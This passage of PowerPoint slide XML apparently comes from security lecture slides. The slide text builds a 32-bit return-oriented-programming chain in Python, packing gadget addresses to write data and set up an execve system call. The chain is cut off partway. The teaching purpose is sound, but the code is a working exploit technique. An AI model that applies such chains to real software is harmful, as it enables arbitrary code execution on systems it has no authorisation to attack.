              </a:rPr>
              <a:t> vector for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, need to have @.data followed by zero</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># Let's use @.data + 12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x0806e91a) # pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x080ea06c) # @.data +12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x080bb6d6) # pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x080ea060) # @.data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x0809a67d) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># Now to add NULL to @.data + 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x0806e91a) # pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x080ea070) # @.data + 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x80541b0)  # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x0809a67d) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>361</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="90177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8155"/>
            <a:ext cx="8229600" cy="6400800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># Now we have all the data we need in memory, time to call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(@.data, @.data+12, @.data+8)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> is first argument to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, char* path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x080481c9) # pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x080ea060) # @ .data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> is second argument to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, char** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x080e4bd1) # pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x080ea06c) # @ .data + 12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> is the third argument to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, char** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x0806e91a) # pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x080ea068) # @ .data +8 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> must be 11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># NOTE: we could remove the next line if we are 100% sure that %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> is zero</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x80541b0) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
